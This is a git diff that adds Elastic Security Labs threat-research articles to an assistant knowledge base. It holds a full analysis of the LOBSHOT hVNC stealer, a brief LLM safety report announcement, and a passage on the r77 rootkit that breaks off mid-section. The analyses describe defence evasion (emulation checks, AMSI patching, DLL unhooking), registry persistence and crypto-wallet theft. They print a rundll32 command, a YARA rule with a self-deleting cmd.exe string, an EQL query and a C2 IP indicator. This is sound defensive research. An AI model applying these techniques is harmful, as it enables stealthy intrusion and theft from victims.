+- [Using the Elastic stack to detect potential malicious requests and explore exposure to the RCE flaw in the Java Spring Framework.](https://sholzhauer.medium.com/spring4shell-detection-and-response-elastic-946ec4f59026)
+
+**Not already using Elastic Security? You can always get started with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.**
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_discovers_lobshot_malware.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_discovers_lobshot_malware.md
new file mode 100644
index 0000000000000..a46f01948af97
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_discovers_lobshot_malware.md
@@ -0,0 +1,383 @@
+---
+title: "Elastic Security Labs discovers the LOBSHOT malware"
+slug: "elastic-security-labs-discovers-lobshot-malware"
+date: "2023-05-16"
+subtitle: "An analysis of LOBSHOT, an hVNC malware family spreading through Google Ads."
+description: "Elastic Security Labs is naming a new malware family, LOBSHOT. LOBSHOT propagates and infiltrates targeted networks through Google Ads and hVNC sessions to deploy backdoors masquerading as legitimate application installers."
+author:
+  - slug: daniel-stepanic
+image: "photo-edited-08@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - lobshot
+  - ref5873
+---
+
+## Key takeaways
+
+- Adversaries continue to abuse and increase reach through malvertising such as Google Ads by impersonating legitimate software
+- Elastic Security Labs is shedding light on an undiscovered hVNC malware that has been quietly collecting a large install base
+- This malware we are calling LOBSHOT appears to be leveraged for financial purposes employing banking trojan and info-stealing capabilities
+
+## Preamble
+
+Elastic Security Labs along with the research community noticed a large spike in the adoption of malvertising earlier this year. Attackers promoted their malware using an elaborate scheme of fake websites through Google Ads and embedding backdoors in what appears to users as legitimate installers. In this post, we will highlight one malware family we observed from this spike we’re calling LOBSHOT. LOBSHOT continues to collect victims while staying under the radar.
+
+One of LOBSHOT’s core capabilities is around its hVNC (Hidden Virtual Network Computing) component. These kinds of modules allow for direct and unobserved access to the machine. This feature continues to be successful in bypassing fraud detection systems and is often baked into many popular families as plugins.
+
+We will walk through the LOBSHOT infection chain and its behaviors. Additionally, we will provide a YARA signature and configuration extractor for this family.
+
+![LOBSHOT infection chain](/assets/images/elastic-security-labs-discovers-lobshot-malware/image9.png)
+
+Throughout our analysis, we observed infrastructure known to belong to [TA505](https://malpedia.caad.fkie.fraunhofer.de/actor/ta505). TA505 is a well-known cybercrime group associated with Dridex, Locky, and Necurs campaigns. A loader documented by Proofpoint, known as [Get2](https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader), has also been tied to the same domains in the past that we observed with LOBSHOT. We assess with moderate confidence that LOBSHOT is a new malware capability leveraged by TA505 starting in 2022.
+
+## Campaign context
+
+Earlier this year, Elastic Security Labs observed multiple infections with an interesting chain of events that resulted in the execution of an unknown hVNC malware, which we are calling LOBSHOT. Around this same time, similar infection chains were observed in the security community with commonalities of users searching for legitimate software downloads that ended up getting served illegitimate software from promoted ads from Google [[1](https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/), [2](https://twitter.com/1ZRR4H/status/1617661947851464704?s=20), [3](https://twitter.com/Malwar3Ninja/status/1617423187415044099?s=20), [4](https://twitter.com/malwrhunterteam/status/1617605240316129280?s=20)].
+
+In one example, the malicious ad was for a legitimate remote desktop solution, AnyDesk. Careful examination of the URL goes to `https://www.amydecke[.]website` instead of the legitimate AnyDesk URL, `https://www.anydesk[.]com`.
+
+![Malicious Google Ad](/assets/images/elastic-security-labs-discovers-lobshot-malware/image22.jpg)
+
+The landing pages were very convincing with similar branding as the legitimate software and included Download Now buttons that pointed to an MSI installer.
+
+![Fake AnyDesk landing page for installer](/assets/images/elastic-security-labs-discovers-lobshot-malware/image13.jpg)
+
+Thanks to security researcher [Will Dormann](https://twitter.com/wdormann), we were able to [view](https://twitter.com/wdormann/status/1617612216945250304?s=20) the screenshots from the AnyDesk campaign.
+
+![Tweet referencing AnyDesk infection chain](/assets/images/elastic-security-labs-discovers-lobshot-malware/image15.jpg)
+
+At the time of publication, we haven’t seen any previous public information about LOBSHOT, so we will focus our research on LOBSHOT’s functionality and capabilities.
+
+## LOBSHOT code analysis
+
+To focus on the LOBSHOT malware, we will skip the initial infection chain. For these initial details, here is a good [sandbox](https://www.joesandbox.com/analysis/787624/0/html) report to look over for general TTPs. We have observed over 500 unique LOBSHOT samples since last July. The samples we have observed are compiled as 32-bit DLLs or 32-bit executables typically ranging around **93** KB to **124** KB. Consider the following [sample](https://www.virustotal.com/gui/file/e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6) representative of LOBSHOT for purposes of this analysis.
+
+### Dynamic API resolution
+
+In our LOBSHOT sample, like most malware we see today, it employs dynamic import resolution to evade security products and slow down the rapid identification of its capabilities. This process involves resolving the names of the Windows APIs that the malware needs at runtime as opposed to placing the imports into the program ahead of time.
+
+![Resolving Windows Registry APIs through LoadLibraryA/GetProcessAddress](/assets/images/elastic-security-labs-discovers-lobshot-malware/image10.jpg)
+
+### Defender emulation check
+
+After the initial libraries are loaded, LOBSHOT performs a Windows Defender anti-emulation check by verifying if the computer name matches the string **HAL9TH** and if the username matches **JohnDoe**. These are hard-coded values within the emulation layer of Defender, if they are present, the malware immediately stops running. This kind of verification has been incorporated in many other stealers including Arkei, Vidar, and Oski. Below is the emulation output using the [Qiling](https://github.com/qilingframework/qiling) framework highlighting these verification checks.
+
+![Defender checks via Qiling](/assets/images/elastic-security-labs-discovers-lobshot-malware/image30.jpg)
+
+### String obfuscation
+
+This malware hides its primary strings through a straightforward encryption function using different bitwise operators. To perform the string decryption, LOBSHOT uses an initial seed from the [WTS_SESSION_INFO](https://learn.microsoft.com/en-us/windows/desktop/api/wtsapi32/ns-wtsapi32-wts_session_infoa) structure from a call to **WTSEnumerateSessionsA.**
+
+![LOBSHOT calling WTSEnumerateSessionsA](/assets/images/elastic-security-labs-discovers-lobshot-malware/image29.jpg)
+
+In this case, the malware developer sets up the initial seed by performing an XOR on the **SessionID** (always a **0** ) and the **S** char from “Services”.
+
+![WTS_SESSION_INFO structure used as the initial seed for string decryption](/assets/images/elastic-security-labs-discovers-lobshot-malware/image4.jpg)
+
+### Initial enumeration
+
+Before sending any outbound network requests, LOBSHOT builds a custom structure containing enumerated data from the machine including:
+
+- GUID of machine derived from **SOFTWARE\Microsoft\Cryptography\MachineGuid**
+- Windows edition, username, computer name
+- A VM check, number of processes running, process ID, parent process of malware
+- Windows desktop object details
+  - Screen height/width
+  - Display device information
+  - Handles to the desktop objects and windows
+  - DPI for the display(s)
+
+![Malware retrieving Windows desktop object information](/assets/images/elastic-security-labs-discovers-lobshot-malware/image12.jpg)
+
+### Execution flow
+
+After LOBSHOT is executed, it moves a copy of itself to the **C:\ProgramData** folder, spawning a new process using **explorer.exe** , terminating the original process, and finally deleting the original file. This design choice is used in an attempt to break the process tree ancestry; making it harder to spot for analysts.
+
+![The LOBSHOT process tree as observed with Elastic Defend](/assets/images/elastic-security-labs-discovers-lobshot-malware/image5.jpg)
+
+Below is a screenshot after the initial execution, the malware is now parentless and running from the **C:\ProgramData** directory.
+
+![ LOBSHOT running without a parent process](/assets/images/elastic-security-labs-discovers-lobshot-malware/image25.jpg)
+
+### Persistence
+
+For persistence, LOBSHOT leverages the [Registry run key persistence method](https://attack.mitre.org/techniques/T1547/001/). In our sample, this is placed in the **HKEY_CURRENT_USER** Registry hive with a randomly generated name pointing to the malware located in **C:\ProgramData.**
+
+![Registry key persistence](/assets/images/elastic-security-labs-discovers-lobshot-malware/image18.jpg)
+
+In addition, it sets Registry key data under the **Software\Microsoft\Windows NT\CurrentVersion\Devices** key path which is used to check for a hardcoded global identifier key that would indicate the system had already been infected. In our sample, the **Display** value is set to the string **134a1160**. The results from the stealer feature are recorded inside the **Default Printer** value. We'll discuss the stealer functionality in the next section.
+
+![Registry hive used to store data](/assets/images/elastic-security-labs-discovers-lobshot-malware/image16.jpg)
+
+### Stealer functionality
+
+With the persistence mechanism established, LOBSHOT starts a new thread kicking off the stealer functionality. It starts by targeting specific Google Chrome extensions that deal with cryptocurrency wallets. Below are Procmon outputs showing LOBSHOT trying to access 32 Chrome wallet extensions, nine Edge wallet extensions, and 11 Firefox wallet extensions.
+
+![Chrome extensions related to cryptocurrency wallets](/assets/images/elastic-security-labs-discovers-lobshot-malware/image14.jpg)
+
+![Edge extensions related to cryptocurrency wallets](/assets/images/elastic-security-labs-discovers-lobshot-malware/image3.jpg)
+
+![Firefox extensions related to cryptocurrency wallets](/assets/images/elastic-security-labs-discovers-lobshot-malware/image2.jpg)
+
+For the complete listing of the different cryptocurrencies mapped to their extension IDs, see the [appendix](https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware#appendix).
+
+If there is a match with any of these extensions, the results are inserted in the **Software\Microsoft\Windows NT\CurrentVersion\Devices** Registry key value as binary data with the format of browser name_extension name. Below is an example after the registry modification showing: **Chrome_Yoroi**.
+
+![Stealer component writing found wallet to registry](/assets/images/elastic-security-labs-discovers-lobshot-malware/image7.jpg)
+
+After the browser extensions are enumerated, there is a check for a hardcoded file titled **hmr\_\*.dat** inside the **C:\ProgramData** directory. If this file exists it will be executed with **rundll32.exe** with the following command-line arguments:
+
+**rundll32.exe "C:\ProgramData\hmr_1.dat", #1 hmod**
+
+While we didn’t observe this behavior directly, this function appears to show off a feature baked in by the developer allowing the ability for additional execution options such as loading their own DLL.
+
+### Network communications
+
+For each LOBSHOT sample we have reviewed, there is a hardcoded IP and port that is decrypted from the binary that is used as the primary C2. The malware beacons every 5 seconds communicating by using the following calls:
+
+- **ws2_32.socket**
+- **ws2_32.connect**
+- **ws2_32.send**
+- **ws2_32.select**
+- **ws2_32.recv**
+- **ws2_32.shutdown**
+- **ws2_32.closesocket**
+
+On these outbound requests, it sends pseudorandom hard-coded data along with a shortened GUID value and version number of the module.
+
+![Hardcoded values and version in request](/assets/images/elastic-security-labs-discovers-lobshot-malware/image20.jpg)
+
+Below is an example of the send request buffer sent during the initial outbound requests showing the above-hardcoded values and version number.
+
+![Request buffer on outbound network traffic](/assets/images/elastic-security-labs-discovers-lobshot-malware/image27.jpg)
+
+![Hardcoded values within outbound network traffic request](/assets/images/elastic-security-labs-discovers-lobshot-malware/image19.jpg)
+
+Searching for the above **mov** instruction paired with the first **DWORD** of the hardcoded value ( **C7 06 25 56 0A DC** ) shows over **550** samples in VirusTotal within the last year. With some of the first samples showing up in late July 2022. The prevalence of these hardcoded values shows that it has been actively used and under development for a long period of time, and will likely continue to be used in the future.
+
+![VirusTotal VTGrep search on hardcoded bytes](/assets/images/elastic-security-labs-discovers-lobshot-malware/image26.jpg)
+
+After this initial handshake, LOBSHOT will send the previous custom data structure containing the enumerated data such as the hostname, username, windows objects, etc. over this port.
+
+![The Wireshark output of outbound requests containing victim host information](/assets/images/elastic-security-labs-discovers-lobshot-malware/image17.jpg)
+
+### Capabilities
+
+One of LOBSHOT’s core capabilities is around its hVNC (Hidden Virtual Network Computing) module.
+
+> Unlike traditional VNC (Virtual Network Computing) where the software provides remote access to a machine with the user’s consent and the visibility of the actions taken on the machine can be clearly observed. hVNC acts in the opposite way designed to stay stealthy where all actions by an attacker are taking place on the same machine, but can’t be visibly observed by the victim. hVNC became a popular solution within the banking trojan space to bypass device and fraud detection solutions. More details on hVNC can be found [here](https://deepsec.net/docs/Slides/2017/Who_Hid_My_Desktop_Or_Safran_Pavel_Asinovsky.pdf).
+
+LOBSHOT implements the hVNC feature by generating a hidden desktop using the **CreateDesktopW** Windows API and then assigning the desktop to the malware using the **SetThreadDesktop** API **.** A new Windows **explorer.exe** process is then created under the context of the new hidden desktop.
+
+![LOBSHOT’s hidden desktop creation](/assets/images/elastic-security-labs-discovers-lobshot-malware/image21.jpg)
+
+At this stage, the victim machine will start sending screen captures that represent the hidden desktop that is sent to a listening client controlled by the attacker. The attacker interacts with the client by controlling the keyboard, clicking buttons, and moving the mouse, these capabilities provide the attacker full remote control of the device.
+
+Within LOBSHOT’s hVNC module, there is a built-in GUI menu that allows the attacker to run the following commands quickly:
+
+- Start new **explorer.exe** process
+- Start Windows Run command
+- Start new Windows process with provided command
+- Start Browsers (Internet Explorer, Edge, Firefox)
+- Terminate existing explorer.exe processes and start new explorer.exe process
+- Tamper with Windows sound settings
+- Set/retrieve Clipboard text
+- Activate Start Menu
+- Modify DPI Awareness settings
+
+![Execute the run dialog inside the hVNC module](/assets/images/elastic-security-labs-discovers-lobshot-malware/image8.jpg)
+
+![Clipboard grabber inside the hVNC module](/assets/images/elastic-security-labs-discovers-lobshot-malware/image11.jpg)
+
+![CMD execution inside the hVNC module](/assets/images/elastic-security-labs-discovers-lobshot-malware/image6.jpg)
+
+While the main functionality is centered on LOBSHOT’s hVNC module, it does have additional capabilities. One example is its ability to swap out its C2 provided by an operator; it manages this by writing the new C2 details into the registry key path **Software\Microsoft\Windows NT\CurrentVersion\Devices** under the **Video** value.
+
+![Updating C2 through registry modification](/assets/images/elastic-security-labs-discovers-lobshot-malware/image24.jpg)
+
+LOBSHOT also includes an update mechanism where it will remove previous modifications to the registry such as removing the “Display” value and Run key persistence, starting a new process, and finally exiting the existing process.
+
+![Remove existing registry key](/assets/images/elastic-security-labs-discovers-lobshot-malware/image28.jpg)
+
+![Spawn new LOBSHOT process](/assets/images/elastic-security-labs-discovers-lobshot-malware/image1.jpg)
+
+## LOBSHOT configuration extractor
+
+Elastic Security Labs has released an open source tool, under the Elastic 2.0 license, that will allow for configurations to be extracted from LOBSHOT samples. The tool can be downloaded [here](https://github.com/elastic/labs-releases/tree/main/extractors/lobshot).
+
+![](/assets/images/elastic-security-labs-discovers-lobshot-malware/image23.jpg)
+
+The extractor can run at the individual file or directory level, examples are below:
+
+- **python lobshot_config_extractor.py --file sample.bin**
+- **python lobshot_config_extractor.py --directory samples**
+
+## Summary
+
+Threat groups are continuing to leverage malvertising techniques to masquerade legitimate software with backdoors like LOBSHOT. These kinds of malware seem small, but end up packing significant functionality which helps threat actors move quickly during the initial access stages with fully interactive remote control capabilities. We are continuing to see new samples related to this family each week, and expect it to be around for some time.
+
+## Detection logic
+
+### Prevention
+
+- [Suspicious Windows Explorer Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_windows_explorer_execution.toml)
+- [Suspicious Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_parent_child_relationship.toml)
+- [Windows.Trojan.Lobshot](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Lobshot.yar)
+
+### Detection
+
+#### EQL query
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar
+
+The following EQL query can be used to detect suspicious grandparent, parent, child relationships observed with LOBSHOT.
+
+```
+sequence by host.id, user.id with maxspan=1m
+ [process where event.type == "start" and not startsWith~(process.executable, process.parent.executable)] by process.parent.name, process.entity\_id
+ [file where event.type == "deletion"] by file.name, process.entity\_id
+ [process where event.type == "start" and not startsWith~(process.executable, process.parent.executable)] by process.name, process.parent.entity\_id
+until [process where event.type == "end"] by process.name, process.entity\_id
+```
+
+#### YARA rule
+
+```
+rule Windows_Trojan_Lobshot {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-04-18"
+        last_modified = "2023-04-18"
+        license = "Elastic License v2"
+        os = "Windows"
+        threat_name = "Windows.Trojan.Lobshot"
+        reference_sample = "e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6"
+    strings:
+        $str0 = "HVNC Remote Control" ascii fullword
+        $str1 = " Error # %d - %08lx" ascii fullword
+        $str2 = "Set  clipboard text failed." ascii fullword
+        $str3 = "OK %08lx %08lx %d" ascii fullword
+        $str4 = "\") & (rundll32.exe \"" wide fullword
+        $str5 = "%LOCALAPPDATA%\\svc.db" wide fullword
+        $str6 = "cmd.exe /c (ping -n 10 127.0.0.1) & (del /F /Q \"" wide fullword
+        $seq_str_decrypt = { 8A 5A ?? 8D 52 ?? 80 EB ?? 85 FF 74 ?? C0 E0 ?? 2C ?? 0A C3 32 C1 32 C7 88 06 32 E8 83 C6 ?? 83 C5 ?? EB ?? }
+        $seq_emu_check = { 8B 35 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? C7 44 24 ?? 48 41 4C 39 50 C7 44 24 ?? 54 48 00 00 FF D6 }
+        $seq_enum_xor = { FF 15 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? 00 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 68 07 80 00 00 8B 41 ?? 8A 00 32 01 A2 ?? ?? ?? ?? }
+        $seq_create_guid = { 8D 48 ?? 80 F9 ?? 77 ?? 2C ?? C1 E2 ?? 46 0F B6 C8 0B D1 83 FE ?? 7C ?? 5F 8B C2 5E C3 }
+    condition:
+        2 of ($seq*) or 5 of ($str*)
+}
+```
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)
+- [Data from Local System](https://attack.mitre.org/techniques/T1005/)
+- [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033/)
+- [Obfuscated Files or Information: Dynamic API Resolution](https://attack.mitre.org/techniques/T1027/007/)
+- [Remote Services: VNC](https://attack.mitre.org/techniques/T1021/005/)
+- [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)
+- [Clipboard Data](https://attack.mitre.org/techniques/T1115/)
+
+## Observations
+
+All observables are also available for download in both [ECS and STIX format](https://github.com/elastic/labs-releases/tree/main/indicators/lobshot). Additionally, we have created a [VirusTotal Collection](https://www.virustotal.com/gui/collection/abe7f5f8c49b387114e46957feb347af705d1d90733f4b26341e2e5299cbbf4c) with all indicators.
+
+| Indicator                                                        | Type       | Reference  |
+| ---------------------------------------------------------------- | ---------- | ---------- |
+| 95.217.125.200                                                   | IP Address | LOBSHOT C2 |
+| e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6 | SHA-256    | LOBSHOT    |
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://malpedia.caad.fkie.fraunhofer.de/actor/ta505](https://malpedia.caad.fkie.fraunhofer.de/actor/ta505)
+- [https://twitter.com/wdormann/status/1617612216945250304?s=20](https://twitter.com/wdormann/status/1617612216945250304?s=20)
+- [https://www.malware-traffic-analysis.net/2023/01/23/index.html](https://www.malware-traffic-analysis.net/2023/01/23/index.html)
+
+## Appendix
+
+### Chrome wallet extensions
+
+| Wallet name            | Extension ID                     |
+| ---------------------- | -------------------------------- |
+| Yoroi                  | ffnbelfdoeiohenkjibnmadjiehjhajb |
+| TronLink               | ibnejdfjmmkpcnlpebklmnkoeoihofec |
+| Nifty Wallet           | jbdaocneiiinmjbjlgalhcelgbejmnid |
+| MetaMask               | nkbihfbeogaeaoehlefnkodbefgpgknn |
+| Math Wallet            | afbcbjpbpfadlkmhmclhkeeodmamcflc |
+| Coinbase Wallet        | hnfanknocfeofbddgcijnmhnfnkdnaad |
+| Binance Wallet         | fhbohimaelbohpjbbldcngcnapndodjp |
+| Brave Wallet           | odbfpeeihdkbihmopkbjmoonfanlbfcl |
+| Guarda                 | hpglfhgfnhbgpjdenjgmdgoeiappafln |
+| Equal Wallet           | blnieiiffboillknjnepogjhkgnoapac |
+| Jaxx Liberty           | cjelfplplebdjjenllpjcblmjkfcffne |
+| BitApp Wallet          | fihkakfobkmkjojpchpfgcmhfjnmnfpi |
+| iWallet                | kncchdigobghenbbaddojjnnaogfppfj |
+| Wombat                 | amkmjjmmflddogmhpjloimipbofnfjih |
+| Oxygen                 | fhilaheimglignddkjgofkcbgekhenbh |
+| MyEtherWallet          | nlbmnnijcnlegkjjpcfjclmcfggfefdm |
+| GuildWallet            | nanjmdknhkinifnkgdcggcfnhdaammmj |
+| Saturn Wallet          | nkddgncdjgjfcddamfgcmfnlhccnimig |
+| Ronin Wallet           | fnjhmkhhmkbjkkabndcnnogagogbneec |
+| Station Wallet         | aiifbnbfobpmeekipheeijimdpnlpgpp |
+| Harmony                | fnnegphlobjdpkhecapkijjdkgcjhkib |
+| Coin98 Wallet          | aeachknmefphepccionboohckonoeemg |
+| EVER Wallet            | cgeeodpfagjceefieflmdfphplkenlfk |
+| KardiaChain Wallet     | pdadjkfkgcafgbceimcpbkalnfnepbnk |
+| Phantom                | bfnaelmomeimhlpmgjnjophhpkkoljpa |
+| Pali Wallet            | mgffkfbidihjpoaomajlbgchddlicgpn |
+| BOLT X                 | aodkkagnadcbobfpggfnjeongemjbjca |
+| Liquality Wallet       | kpfopkelmapcoipemfendmdcghnegimn |
+| XDEFI Wallet           | hmeobnfnfcmdkdcmlblgagmfpfboieaf |
+| Nami                   | lpfcbjknijpeeillifnkikgncikgfhdo |
+| MultiversX DeFi Wallet | dngmlblcodfobpdpecaadgfbcggfjfnm |
+
+### Edge wallet extensions
+
+| Wallet name    | Extension ID                     |
+| -------------- | -------------------------------- |
+| Yoroi          | akoiaibnepcedcplijmiamnaigbepmcb |
+| MetaMask       | ejbalbakoplchlghecdalmeeeajnimhm |
+| Math Wallet    | dfeccadlilpndjjohbjdblepmjeahlmm |
+| Ronin Wallet   | kjmoohlgokccodicjjfebfomlbljgfhk |
+| Station Wallet | ajkhoeiiokighlmdnlakpjfoobnjinie |
+| BDLT Wallet    | fplfipmamcjaknpgnipjeaeeidnjooao |
+| Glow           | niihfokdlimbddhfmngnplgfcgpmlido |
+| OneKey         | obffkkagpmohennipjokmpllocnlndac |
+| MetaWallet     | kfocnlddfahihoalinnfbnfmopjokmhl |
+
+### Firefox wallet extensions
+
+| Wallet name  | Extension ID                                 |
+| ------------ | -------------------------------------------- |
+| Yoroi        | \{530f7c6c-6077-4703-8f71-cb368c663e35\}.xpi |
+| Ronin Wallet | ronin-wallet@axieinfinity.com.xpi            |
+| MetaMask     | webextension@metamask.io.xpi                 |
+| TronLink     | \{5799d9b6-8343-4c26-9ab6-5d2ad39884ce\}.xpi |
+|              | \{aa812bee-9e92-48ba-9570-5faf0cfe2578\}.xpi |
+|              | \{59ea5f29-6ea9-40b5-83cd-937249b001e1\}.xpi |
+|              | \{d8ddfc2a-97d9-4c60-8b53-5edd299b6674\}.xpi |
+| Phantom      | \{7c42eea1-b3e4-4be4-a56f-82a5852b12dc\}.xpi |
+|              | \{b3e96b5f-b5bf-8b48-846b-52f430365e80\}.xpi |
+|              | \{eb1fb57b-ca3d-4624-a841-728fdb28455f\}.xpi |
+|              | \{76596e30-ecdb-477a-91fd-c08f2018df1a\}.xpi |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_releases_llm_safety_report.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_releases_llm_safety_report.md
new file mode 100644
index 0000000000000..08cb0cf89924a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_releases_llm_safety_report.md
@@ -0,0 +1,22 @@
+---
+title: "Now available: The LLM safety assessment"
+slug: "elastic-security-labs-releases-llm-safety-report"
+date: "2023-05-06"
+description: "Check out the newest report from Elastic Security Labs, which explores how you can protect your organization from LLM threats."
+author:
+  - slug: devon-kerr
+image: "image1.png"
+category:
+  - slug: reports
+tags:
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
+Today Elastic Security Labs publishes our [LLM safety assessment report](https://www.elastic.co/security/llm-safety-report?utm_source=labshome), a research endeavor meant to collect and clarify information about practical threats to large language models. These forms of generative AI are likely to become ubiquitous in the near future-- but we need to consider the security of them __a little sooner__ than that.
+
+One of the most immediate and significant challenges-- and this is true of every new data source-- is understanding the properties and characteristics of the data, if it exists. You can read more about that process in this [excellent](https://www.elastic.co/security-labs/embedding-security-in-llm-workflows) [pair](https://www.elastic.co/security-labs/elastic-advances-llm-security) of articles, which speak to a challenge many detection engineers are facing today.
+
+New data sources are problematic in a unique way: with no visibility to rank malicious techniques by popularity, how does a detection engineer determine the most effective detections? Mapping fields and normalizing a data source is a good __initial__ step that makes it possible to begin investigating; it's exciting to be a little closer to the answer today than we were yesterday.
+
+Check out the new report, browse our [prior research](https://www.elastic.co/security-labs/topics/generative-ai) on this topic, and join us in preparing for tomorrow.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_steps_through_the_r77_rootkit.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_steps_through_the_r77_rootkit.md
new file mode 100644
index 0000000000000..2d0b531828f69
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_labs_steps_through_the_r77_rootkit.md
@@ -0,0 +1,378 @@
+---
+title: "Elastic Security Labs steps through the r77 rootkit"
+slug: "elastic-security-labs-steps-through-the-r77-rootkit"
+date: "2023-05-22"
+subtitle: "Open source userland rootkit used to deploy the XMRIG crypto miner."
+description: "Elastic Security Labs explores a campaign leveraging the r77 rootkit and has been observed deploying the XMRIG crypto miner. The research highlights the different modules of the rootkit and how they’re used to deploy additional malicious payloads."
+author:
+  - slug: salim-bitam
+image: "photo-edited-06@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - ref9597
+  - crypto
+  - xmrig
+---
+
+## Key takeaways
+
+- r77 is a stealthy open source rootkit that is being used to deploy the XMRIG crypto miner
+- r77 uses several modules as a way to successfully install and maintain persistence
+- Campaign authors are leaning heavily on open source tools and scripts, possibly to abstract attribution or reduce development costs
+
+## Preamble
+
+Elastic Security Labs has uncovered a malicious crypto miner that had been deployed in several Asian countries. The campaign owners are using an open source userland rootkit, called r77.
+
+r77’s primary purpose is to hide the presence of other software on a system by hooking important Windows APIs, making it an ideal tool for cybercriminals looking to carry out stealthy attacks. By leveraging the r77 rootkit, the authors of the malicious crypto miner were able to evade detection and continue their campaign undetected.
+
+In this research, we will highlight the inner workings of the r77 rootkit and explore how it was used in conjunction with the crypto miner. We hope to raise awareness of the ongoing threat posed by cybercriminals and encourage individuals and organizations to take proactive steps to protect their systems and networks.
+
+## Code analysis
+
+### Overview
+
+The rootkit is comprised of 4 distinct modules:
+
+1. The installer module.
+2. The stager module.
+3. The service module.
+4. The core module.
+
+![r77 rootkit and crypto miner execution flow](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image3.jpg)
+
+We will cover each module and phase in detail below.
+
+### Installer module
+
+Its first task is to store the stager module PE in the registry, a technique commonly used by malware authors to persistently store their malicious code on a system. Once the stager module is stored in the registry, the installer module builds a PowerShell command that loads the stager module from the registry and executes it, the installer module then creates a scheduled task to run the PowerShell command.
+
+The installer locates the stager module stored as a PE resource named **EXE** , it then creates a new registry key called **$77stager** in the **HKEY_LOCAL_MACHINE\SOFTWARE** hive and writes the stager module to the key.
+
+![Writing the stager module to the registry](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image2.jpg)
+
+The installer then builds a PowerShell command to reflectively load the .NET stager in memory, using the **[Reflection.Assembly]::Load** method. Additionally, [Microsoft’s Antimalware Scan Interface](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) (AMSI) is circumvented by patching the **AmsiScanBuffer** API so that it will always return an [**AMSI_RESULT_CLEAN**](https://learn.microsoft.com/en-us/windows/win32/api/amsi/ne-amsi-amsi_result) response. **AMSI_RESULT_CLEAN** means that the scanned content is “Known good. No detection found, and the result is likely not going to change after a future definition update.” The PowerShell command is then obfuscated by replacing variable names with random strings.
+
+![Obfuscated PowerShell command bypassing AMSI](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image7.jpg)
+
+Finally, the installer creates a scheduled task to execute the PowerShell command using COM objects, the task is configured to execute at startup with the SYSTEM account.
+
+![The installer module creates a scheduled task](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image6.jpg)
+
+### Stager module
+
+The stager is a .NET-based binary and it is responsible for unhooking DLLs, adjusting the SeDebugPrivilege setting, decrypting and decompressing the service module, and injecting the service module. This is accomplished using a process hollowing technique into a newly spawned process under another legitimate process through PPID spoofing.
+
+#### API unhooking
+
+To defeat the userland inline API hooking set by endpoint solutions, the stager module first completely unhooks two important DLLs that contain the API used by the rootkit, namely **NTDLL.dll** and **KERNEL32.dll**.
+
+![Unhooking NTDLL and KERNEL32](/assets/images/elastic-security-labs-steps-through-the-r77-rootkit/image3.jpg)
+
+This technique involves the following steps:
+
+1. **Retrieving the DLL** : The stager module reads the target DLL file from the disk.
+2. **Mapping the DLL to memory** : The stager module creates a new file mapping using the CreateFileMapping function, which allows the DLL to be loaded into the process's memory.
+3. **Analyzing the DLL's section table** : The stager module analyzes the section table of the newly mapped DLL to identify the relevant section where the executable code (often referred to as the **.text** section) is stored.
+4. **Overwriting the code section** : Once the **.text** section is identified, the stager module replaces the contents of the corresponding section in the already loaded DLL with the code from the fresh **.text** section.
+
+#### SeDebugPrivilege
+
